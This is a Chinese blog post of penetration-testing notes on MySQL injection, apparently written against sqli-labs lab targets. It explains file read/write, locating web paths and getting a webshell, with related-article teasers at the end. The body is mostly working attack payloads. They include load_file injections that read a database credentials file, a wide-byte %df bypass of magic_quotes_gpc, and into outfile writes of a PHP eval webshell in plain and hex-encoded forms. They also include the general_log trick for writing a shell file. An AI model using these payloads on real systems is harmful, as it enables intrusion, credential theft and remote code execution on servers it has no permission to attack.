MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc

最新推荐文章于 2024-09-12 19:16:00 发布
最新推荐文章于 2024-09-12 19:16:00 发布
阅读量4.2k 收藏 4
点赞数 2
分类专栏: 渗透笔记 文章标签: web安全 安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56607768/article/details/124067398
版权

文章目录

1.SQL注入的思维导图

请添加图片描述

2.MYSQL注入思维导图

请添加图片描述

3.文件读写

文件读写操作:

load_file():读取函数
into outfile或iinto dumpfile:导出函数

会用到MySQL数据库里两个内置函数,这两个函数是MySQL数据库特有的,在其他数据库是没有的或者在其他数据库中写法不 同,所以这是为什么说注入点分数据库的原因,因为每个数据库内置的安全机制和它的功能不同,这才导致在注入的时候针对不用的数据库采取的攻击思路也不同。MySQL有内置读取的操作函数,我们可以调用这个函数作为注入的攻击。

获取路径的常见方法
报错显示、遗留文件、漏洞报错、平台配置文件、爆破等

获取路径常见方法

(1).报错显示

一般网站出现错误的时候它会泄露出路径

请添加图片描述

(2).遗留文件

请添加图片描述

请添加图片描述

(3).漏洞报错

知道对方是用什么程序搭建再去网上去搜索漏洞信息:phpcms 爆路径

请添加图片描述

(4).平台配置文件

通过读取文件来读取搭建网站平台的配置文件。缺点:路径不是默认的,一旦更改很难找到路径

(5). 爆破

windows:
d:/wwwroot/xiaodi8/
linux:
/var/www/xiaodi8

文件读写函数

(1)load_file():读取函数

MYSQL注入中,load_file(函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件

具体参考链接:https://www.cnblogs.com/milantgh/p/3842306.html

使用方法:

请添加图片描述

构造其pyload: 127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,load_file(‘d:/www.txt’),3

请添加图片描述

当magic_quotes_gpc = On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与 NULL(NULL 字符)等字符,都会被加上反斜线或者遇到宽字节,会屏蔽单引号。都可以将文件路径加密成十六进制,下面是以宽字节来举例说明。

将文件路径加密成十六进制,例如C:/phpstudy_pro/WWW/sql/sql-connections/db-creds.inc 加密成 0x433A2F70687073747564795F70726F2F5757572F73716C2F73716C2D636F6E6E656374696F6E732F64622D63726564732E696E63

请添加图片描述

构造其pyload: ?id=-1%df’+union+select+1,load_file(0x433A2F70687073747564795F70726F2F5757572F73716C2F73716C2D636F6E6E656374696F6E732F64622D63726564732E696E63),3–+

请添加图片描述

(2)into outfile或iinto dumpfile:导出函数

请添加图片描述

构造其pyload: 127.0.0.1/sql/Less-2/?id=-1 union select 1,‘xxx’,3 into outfile ‘F:\phpstudy\1.php’–+
请添加图片描述

写入WebShell的几种方式

1、利用Union select 写入

这是最常见的写入方式,union 跟select into outfile,将一句话写入evil.php,仅适用于联合注入。

具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。

?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'

?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"

2、利用分隔符写入

当Mysql注入点为盲注或报错,Union select写入的方式显然是利用不了的,那么可以通过分隔符写入。SQLMAP的 --os-shell命令,所采用的就是一下这种方式。

具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。

?id=1 LIMIT 0,1 INTO OUTFILE 'E:/study/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 --

同样的技巧,一共有四种形式:

?id=1 INTO OUTFILE ‘物理路径’ lines terminated by (一句话hex编码)#
?id=1 INTO OUTFILE ‘物理路径’ fields terminated by (一句话hex编码)#
?id=1 INTO OUTFILE ‘物理路径’ columns terminated by (一句话hex编码)#
?id=1 INTO OUTFILE ‘物理路径’ lines starting by (一句话hex编码)#

3、利用log写入

新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。

具体权限要求:数据库用户需具备Super和File服务器权限、获取物理路径。

show variables like '%general%';             #查看配置
set global general_log = on;                 #开启general log模式
set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址
select '<?php eval($_GET[g]);?>'             #写入shell
set global general_log=off;                  #关闭general log模式
h1dm
关注
专栏目录
MySQL数据库上传webshell的方法
weixin_42373409的博客
09-15 863
1.into outfile方法 在mysql.ini配置文件中参数secure_file_priv的取值决定了写入开关的状态; (1)secure_file_priv=NULL;–>表示写入开关关闭; (2)secure_file_priv=“”;–>表示写入开关打开; (3)secure_file_priv=“web路径”;–>表示写入开关打开,并写入指定路径下,如果写入路径不是web路径,则无法通过此种方法写入webshell。 修改该参数只能通过修改mysql.ini完成,命令行无
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1405
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
Mysql注入读写文件
m_de_g的博客
11-30 3525
1.Mysql注入读文件 MySQL数据库在渗透测试过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)。 读取前提: 1.用户权限足够高,尽量具有root权限。 2.secure_file_priv不为NULL。 修改mysql.ini的配置 可以看到里面secure_file_priv =的配置语句,如果没有的看到配置文件的话,需要添加上 2.Mysql注入写文件 3.写入Webshell 4.Sqlmap安全测试 ...
mysql_getshell的几种方法
最新发布
carmi的博客
09-12 1038
mysql_getshell 一、mysql的--os-shell 利用原理 --os-shell就是使用udf提权获取WebShell。也是通过into oufile向服务器写入两个文件,一个可以直接执行系统命令,一个进行上传文件。此为sqlmap的一个命令,利用这条命令的先决条件: 要求为数据库DBA,使用--is-dba查看当前网站连接的数据库账号是否为mysql user表中的管理员...
【getshellMySQL上传webshell
ssrf
10-20 881
文章目录一、select into outfile直接写入1、利用条件2、查看secure_file_priv值3、写入一句话二、利用全局日志写shell1、查看配置2、开启general_log模式3、修改日志目录为shell地址4、写入shell5、抹除痕迹 一、select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secur
sql注入 mysql&&php常用函数总结
weixin_43745072的博客
11-23 299
information_schema information_schema这这个数据库中保存了MySQL服务器所有数据库的信息。 如数据库名,数据库的表,表栏的数据类型与访问权限等。 再简单点,这台MySQL服务器上,到底有哪些数据库、各个数据库有哪些表, 每张表的字段类型是什么,各个数据库要什么权限才能访问,等等信息都保存在information_schema里面。 information_schema的表schemata中的列schema_name记录了所有数据库的名字 information_sc.
load_file() MYSQL入侵时查看常用敏感信息文件
收集盒 Book box
09-06 1257
以下是大家针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径,合理的利用好,可以加快你的入侵速度.以下是本人入侵时收集起来.如果大家感觉这上面没有的路径.请继续在回复中接起来.一起分享.BY:孤狐浪子   1、 replace(load_f
2020最新PHP面试100题(三)
weixin_49163826的博客
10-08 1109
写几个魔术方法并说明作用? 1 2 3 4 5 6 7 8 9 10 __call()当调用不存在的方法时会自动调用的方法 __autoload()在实例化一个尚未被定义的类是会自动调用次方法来加载类文件 __set()当给未定义的变量赋值时会自动调用的方法 __get()当获取未定义变量的值时会自动调用的方法 __construct()构造方法,实例化类时自动调用的方法 __destroy()销毁对象时自动调用的方法 __unset()当对一个未定义变量调用unset()时自动调用的方法 __isset(
B站小迪安全笔记第十三天-SQL注入MYSQL注入
m0_61530426的博客
07-29 465
B站小迪安全笔记
Sql注入漏洞汇总-上
黑战士的博客
06-04 742
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
sql注入知识点
m0_55772907的博客
04-27 3743
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
magic_quotes_gpc(魔术引号开关)等函数与数据库安全
热门推荐
a3uRa的一个窝
07-29 1万+
magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,对POST、POST、_POST、__GET以及进行数据库操作的sql进行转义处理,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。防止sql注入magic_quotes_gpc = On时,输入数据中含单引号...
php5中的GPC绕过缺陷
zhangjjjc的专栏
02-10 1942
magic_quotes_gpc选项是php中的一个重要的安全设置,当该选项为ON也就是打开的时候,所有从GET,POST,COOKie传递过来的数据中的',", \,以及NULL等元字符都会被自动的加上\实现转义,这个选项使得Sql注入或者插入代码以及XSS中引入字符串或者改变程序流程变得困难,但是在php5中一些特殊变量的存在使得在某些情况下,还是会被恶意用户引入元字符到数据库以及程序中。
gpc是什么mysql_magic_quotes_gpcmysql_real_escape_string、addslashes的区别及用法
weixin_33902301的博客
02-05 597
本篇文章,主要先重点说明magic_quotes_gpcmysql_real_escape_string、addslashes三个函数方法的含义、用法,并举例说明。然后阐述下三者间的区别、关系。一、magic_quotes_gpc这个函数,只有在页面传递 $_GET,$_POST,$_COOKIE 时才会发生作用,主动进行调用,在web客户端执行。对传递的字符串是否进行转义处理。用法: mag...
常见的load_file()读取的敏感信息
blackguest07的博客
01-17 1214
load_file() 函数读取敏感文件,这一章就够了。
【24】WEB安全学习----MySQL注入-9(读写文件)
尚未佩妥剑 转眼便江湖
09-22 1833
这一章介绍下MySQL数据库访问操作系统的一些可利用的功能。 一、读文件 MySQL提供了允许load data infile命令高速地从一个文本文件中读取行,并装入一个表中,看下此命令的说明: load data infile '文件名' into table 表名 测试一下导入,提示“The MySQL server is running with the --secure-file...
字节注入——魔术引号的绕过
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-06 2877
字节注入 原理:由于魔术引号函数的存在magic_quotes_gpc(开关),会自动在’ “ \等前面加上一个\导致sql语句闭合不了,这时候我们就需要输入一些字符,让数据库实现误判,让转义字符\和我们输入的语句组成一个新的汉字来闭合语句。 靶场地址 第一题: 首先先在url栏输入’ and 1=2 %23 发现页面并没有变化,可能存在魔术引号,于是我在’前面添加一个%df重新输入代码 %df...
get_magic_quotes_gpc
03-16
get_magic_quotes_gpc是一个PHP函数,用于检测当前PHP配置中是否开启了magic_quotes_gpc选项。如果开启了,它会自动对从客户端提交的数据进行转义,以防止SQL注入安全问题。但是,这个选项在PHP 5.4及以上版本中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1dm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值